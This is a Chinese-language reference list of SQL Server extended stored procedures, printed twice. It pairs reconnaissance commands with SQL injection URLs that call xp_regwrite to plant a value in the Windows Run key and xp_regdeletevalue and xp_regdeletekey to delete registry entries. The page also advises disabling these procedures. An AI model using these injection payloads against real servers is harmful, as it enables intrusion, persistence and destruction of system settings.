sql server中扩展存储过程大全
--获得MS SQL的版本号
execute master..sp_msgetversion
--得到硬盘文件信息
--参数说明:目录名,目录深度,是否显示文件
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
--列出服务器上安装的所有OLEDB提供的程序
execute master..xp_enum_oledb_providers
--列出服务器上安装的所有代码页
execute master..xp_enumcodepages
--列出服务器上配置的dsn
execute master..xp_enumdsn
--列出sql server错误日志列表,最后更新时间
execute master..xp_enumerrorlogs
--列出服务器上所有windows本地组
execute master..xp_enumgroups
--检测文件存在性
execute master..xp_fileexist 'c:\a.bak'
declare @flag int
exec master..xp_fileexist 'c:\abc.bak',@flag out
if @flag=1
begin
print 'exist'
end
else
begin
print 'no exist'
end
--列出服务器上固定驱动器,以及每个驱动器的可用空间
execute master..xp_fixeddrives
--得到当前sql server服务器的计算机名称
execute master..xp_getnetname
--列出当前错误日志的具体内容
EXEC [master].[dbo].[xp_readerrorlog]
--列出指定目录的所有下一级子目录
EXEC [master].[dbo].[xp_subdirs] 'c:\WINNT'
---列出驱动器的名称
--以字节为单位的空闲空间(low free)
--以驱动器类型:软驱(1),硬盘(2),cd-rom(8)
EXEC [master].[dbo].[xp_availablemedia]
--效果如下:
name low free high free media type
C:\ 1270386688 0 2
D:\ 1726824448 2 2
E:\ 875053056 10 2
F:\ 0 0 8
还有在[master].[dbo].[sp_addlogin]里面有加密函数pwdencrypt,大家感兴趣可以试试
SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,
在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
http://127.0.0.1/view.asp?id=165
存在mssql的sql注入,那么
xp_regwrite 写入注册表
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
http://127.0.0.1/view.asp?id=165;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\run','TestValueName','reg_sz','hello'
注意值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
xp_regdeletekey 删除键,包括该键下所有值
使用方法:
http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
execute master..sp_msgetversion
--得到硬盘文件信息
--参数说明:目录名,目录深度,是否显示文件
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
--列出服务器上安装的所有OLEDB提供的程序
execute master..xp_enum_oledb_providers
--列出服务器上安装的所有代码页
execute master..xp_enumcodepages
--列出服务器上配置的dsn
execute master..xp_enumdsn
--列出sql server错误日志列表,最后更新时间
execute master..xp_enumerrorlogs
--列出服务器上所有windows本地组
execute master..xp_enumgroups
--检测文件存在性
execute master..xp_fileexist 'c:\a.bak'
declare @flag int
exec master..xp_fileexist 'c:\abc.bak',@flag out
if @flag=1
begin
print 'exist'
end
else
begin
print 'no exist'
end
--列出服务器上固定驱动器,以及每个驱动器的可用空间
execute master..xp_fixeddrives
--得到当前sql server服务器的计算机名称
execute master..xp_getnetname
--列出当前错误日志的具体内容
EXEC [master].[dbo].[xp_readerrorlog]
--列出指定目录的所有下一级子目录
EXEC [master].[dbo].[xp_subdirs] 'c:\WINNT'
---列出驱动器的名称
--以字节为单位的空闲空间(low free)
--以驱动器类型:软驱(1),硬盘(2),cd-rom(8)
EXEC [master].[dbo].[xp_availablemedia]
--效果如下:
name low free high free media type
C:\ 1270386688 0 2
D:\ 1726824448 2 2
E:\ 875053056 10 2
F:\ 0 0 8
还有在[master].[dbo].[sp_addlogin]里面有加密函数pwdencrypt,大家感兴趣可以试试
SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,
在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
http://127.0.0.1/view.asp?id=165
存在mssql的sql注入,那么
xp_regwrite 写入注册表
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
http://127.0.0.1/view.asp?id=165;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\run','TestValueName','reg_sz','hello'
注意值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
xp_regdeletekey 删除键,包括该键下所有值
使用方法:
http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'